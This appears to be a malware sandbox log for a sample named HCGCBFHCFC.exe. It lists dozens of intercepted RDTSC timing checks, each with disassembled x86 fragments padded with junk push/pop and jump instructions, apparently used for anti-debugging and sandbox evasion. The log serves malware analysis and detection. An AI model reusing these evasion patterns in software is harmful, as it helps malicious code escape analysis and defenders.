Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3A727 second address: A3A757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4D0E053h 0x00000009 jmp 00007F73D4D0E058h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3A757 second address: A3A75E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3A9FE second address: A3AA03 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3AA03 second address: A3AA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3AA0F second address: A3AA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3AD16 second address: A3AD2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57610h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A4424C second address: A4426A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E058h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A4426A second address: A44285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57615h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A44285 second address: A44289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A443CA second address: A443DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F73D4C5760Dh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A443DE second address: A443F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F73D4D0E054h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A44960 second address: A44987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57617h 0x00000007 jo 00007F73D4C57612h 0x0000000d jp 00007F73D4C57606h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A44AB5 second address: A44AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E052h 0x00000007 jmp 00007F73D4D0E056h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A44AE6 second address: A44AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A44C53 second address: A44C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A4D270 second address: A4D275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A4BAF8 second address: A4BB0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F73D4D0E046h 0x00000010 jnp 00007F73D4D0E046h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A4C091 second address: A4C0B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F73D4C57617h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A4C213 second address: A4C217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A57C36 second address: A57C62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F73D4C57606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F73D4C5761Ch 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007F73D4C57614h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A57C62 second address: A57C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A5792E second address: A57932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A57932 second address: A5797C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4D0E055h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F73D4D0E04Bh 0x00000010 jbe 00007F73D4D0E060h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A5797C second address: A57980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A64E72 second address: A64E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A64E78 second address: A64E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A64E7E second address: A64E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A64A2B second address: A64A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jmp 00007F73D4C5760Fh 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jng 00007F73D4C57606h 0x00000018 push esi 0x00000019 pop esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A64A50 second address: A64A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A64A62 second address: A64A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A64A6C second address: A64A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A744E2 second address: A744E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A794EA second address: A794FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F73D4D0E048h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A83536 second address: A83554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F73D4C5760Bh 0x0000000b jmp 00007F73D4C5760Dh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A83554 second address: A8355A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A8355A second address: A83560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A82174 second address: A8217A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A8217A second address: A82180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A82180 second address: A82187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A82187 second address: A821CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F73D4C57617h 0x00000008 pop edx 0x00000009 pushad 0x0000000a jne 00007F73D4C57606h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F73D4C5760Eh 0x00000017 jng 00007F73D4C57606h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F73D4C5760Bh 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A821CF second address: A821D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A821D4 second address: A821DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A83296 second address: A8329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A8329C second address: A832A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A832A0 second address: A832AA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F73D4D0E04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A8503D second address: A85066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007F73D4C57606h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A89679 second address: A89691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F73D4D0E04Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A89691 second address: A896AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F73D4C57611h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A9DDD3 second address: A9DDE9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F73D4D0E04Ch 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AA9DD6 second address: AA9DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AA9DDC second address: AA9DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AA9DE0 second address: AA9E02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F73D4C57618h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AA9E02 second address: AA9E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AADF2F second address: AADF63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jnp 00007F73D4C57606h 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F73D4C5760Ch 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AADF63 second address: AADF96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F73D4D0E05Fh 0x00000010 jmp 00007F73D4D0E04Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AADF96 second address: AADF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 98C5C1 second address: 98C5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 98C5C5 second address: 98C5F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57618h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F73D4C5760Dh 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 98C5F2 second address: 98C5FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AADC7F second address: AADC9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F73D4C57616h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AADC9D second address: AADCA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AADCA3 second address: AADCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AADCA7 second address: AADCB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AADCB3 second address: AADCB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC887B second address: AC8899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F73D4D0E058h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC8899 second address: AC88D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F73D4C57615h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F73D4C57613h 0x00000013 jno 00007F73D4C57608h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC88D6 second address: AC88DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC7AE6 second address: AC7AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC7C2E second address: AC7C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F73D4D0E046h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC7C3A second address: AC7C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F73D4C57606h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC7D91 second address: AC7D96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC7D96 second address: AC7DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F73D4C57606h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F73D4C5760Dh 0x00000011 popad 0x00000012 push edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jno 00007F73D4C57606h 0x0000001b pop edi 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pushad 0x0000001f pushad 0x00000020 push eax 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC7DC2 second address: AC7DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC8054 second address: AC8078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F73D4C57606h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jmp 00007F73D4C57617h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC8078 second address: AC807E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC807E second address: AC8084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC8084 second address: AC809D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f je 00007F73D4D0E04Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC81EB second address: AC820A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F73D4C57618h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: AC820A second address: AC820F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: ACD06B second address: ACD0B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F73D4C57612h 0x0000000c popad 0x0000000d push eax 0x0000000e jng 00007F73D4C57612h 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D1C91h], esi 0x0000001b push dword ptr [ebp+122D1D49h] 0x00000021 movzx edx, si 0x00000024 push 0D8ADDA5h 0x00000029 push edi 0x0000002a pushad 0x0000002b jc 00007F73D4C57606h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: ACFD32 second address: ACFD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BD0133 second address: 4BD0176 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx ecx, dx 0x0000000f pushfd 0x00000010 jmp 00007F73D4C57613h 0x00000015 sbb si, BADEh 0x0000001a jmp 00007F73D4C57619h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BD0176 second address: 4BD0186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BD0186 second address: 4BD018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BD018A second address: 4BD01B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F73D4D0E057h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BD01B2 second address: 4BD01B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BD01B6 second address: 4BD01BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BD01BC second address: 4BD01C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0ECD second address: 4BB0EDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0EDC second address: 4BB0EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
